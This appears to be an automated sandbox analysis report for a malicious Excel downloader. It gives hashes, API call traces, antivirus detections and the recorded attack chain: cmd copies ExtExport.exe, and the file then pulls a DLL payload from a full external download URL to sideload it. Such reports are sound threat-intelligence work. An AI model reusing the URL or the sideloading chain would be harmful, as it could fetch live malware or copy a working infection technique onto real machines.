Summary | ZeroBOX

document-37-1849.xls

MSOffice File
Category Machine Started Completed
FILE s1_win7_x6401 June 16, 2021, 10:05 a.m. June 16, 2021, 10:07 a.m.
Size 187.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Jun 1 12:24:56 2021, Last Saved Time/Date: Tue Jun 1 12:24:57 2021, Security: 1
MD5 c41a21a821bcdea1d3ab26ebef055eed
SHA256 d1d0ac76e59b9e2a8ae3a433e0186d74fc61417c89fe5ee4b93c02faa1dc58f8
CRC32 1679CE4F
ssdeep 3072:Ghtf+HhTi14PyY63IbwFHKzke41kwph4FW20vKaCLyPKlogs9FlNrk5aWADzS1+5:GzW5i146r3tqwN1fzK8vLC2PKlhwFlNl
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File

Name Response Post-Analysis Lookup
austinheisey.com 51.195.123.188
IP Address Status Action
164.124.101.2 Active Moloch
51.195.123.188 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dce1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dbf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dbe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dba1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06160000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06160000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06170000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06280000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll
cmdline "C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parameters: C:\ycjqFXSM\kO2NIybn ALHJ zqtRI
filepath: C:\ycjqFXSM\kO2NIybn\pDImcT.exe
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
cmdline cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parent_process excel.exe martian_process cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://austinheisey.com/xls/black/index/processingSetRequestDownloadPayloader/?servername=excel
stack_pivoted: 0
filepath_r: C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll
filepath: C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll
2148270085 0
parent_process excel.exe martian_process "C:\ycjqFXSM\kO2NIybn\pDImcT.exe" C:\ycjqFXSM\kO2NIybn ALHJ zqtRI
parent_process excel.exe martian_process "C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parent_process excel.exe martian_process cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parent_process excel.exe martian_process C:\ycjqFXSM\kO2NIybn\pDImcT.exe C:\ycjqFXSM\kO2NIybn ALHJ zqtRI
dead_host 51.195.123.188:443
DrWeb X97M.DownLoader.666
ALYac Trojan.Downloader.XLS.gen
Arcabit Trojan.Generic.D234D754
Cyren Trojan.TSOT-2
Symantec W97M.Downloader
ESET-NOD32 a variant of VBA/TrojanDownloader.Agent.WFH
TrendMicro-HouseCall TROJ_FRS.0NA103F221
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.37017428
MicroWorld-eScan Trojan.GenericKD.37017428
Ad-Aware Trojan.GenericKD.37017428
Emsisoft Trojan.GenericKD.37017428 (B)
Comodo Malware@#rco8ck87qdse
TrendMicro TROJ_FRS.0NA103F221
McAfee-GW-Edition RDN/Encdoc
FireEye Trojan.GenericKD.37017428
Ikarus Trojan-Downloader.VBA.Agent
Avira VBA/Dldr.Agent.ynuil
Gridinsoft Trojan.U.Downloader.oa
Microsoft TrojanDownloader:O97M/Encdoc.EPB!MTB
AegisLab Trojan.MSOffice.Generic.4!c
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData Trojan.GenericKD.37017428
AhnLab-V3 Downloader/XLS.Generic
McAfee RDN/Encdoc
MAX malware (ai score=85)
Fortinet MSExcel/EncBook.AO!tr
AVG Other:Malware-gen [Trj]
file C:\Windows\System32\cmd.exe